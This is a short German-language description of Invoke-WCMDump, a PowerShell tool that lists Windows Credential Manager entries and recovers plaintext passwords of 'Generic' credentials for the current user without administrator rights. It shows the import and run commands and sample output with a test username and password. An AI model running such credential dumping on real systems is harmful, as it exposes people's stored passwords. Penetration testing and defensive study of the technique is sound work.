
PowerShell-Skript zum Auslesen von Windows-Anmeldeinformationen aus dem Anmeldeinformations-Manager
PowerShell-Skript zum Auslesen von Windows-Anmeldeinformationen aus dem Anmeldeinformations-Manager
Invoke-WCMDump listet Windows-Anmeldeinformationen im Anmeldeinformations-Manager auf und extrahiert dann verfügbare Informationen zu jeder einzelnen. Passwörter werden für Anmeldeinformationen vom Typ 'Generic' abgerufen, können aber mit der gleichen Methode nicht für Anmeldeinformationen vom Typ 'Domain' abgerufen werden. Anmeldeinformationen werden nur für den aktuellen Benutzer zurückgegeben.
Erfordert keine Administratorrechte!
Autor: Barrett Adams (@peewpw)
PS>Import-Module .\Invoke-WCMDump.ps1
PS>Invoke-WCMDump
Username : testusername
Password : P@ssw0rd!
Target : TestApplication
Description :
LastWriteTime : 12/9/2017 4:46:50 PM
LastWriteTimeUtc : 12/9/2017 9:46:50 PM
Type : Generic
PersistenceType : Enterprise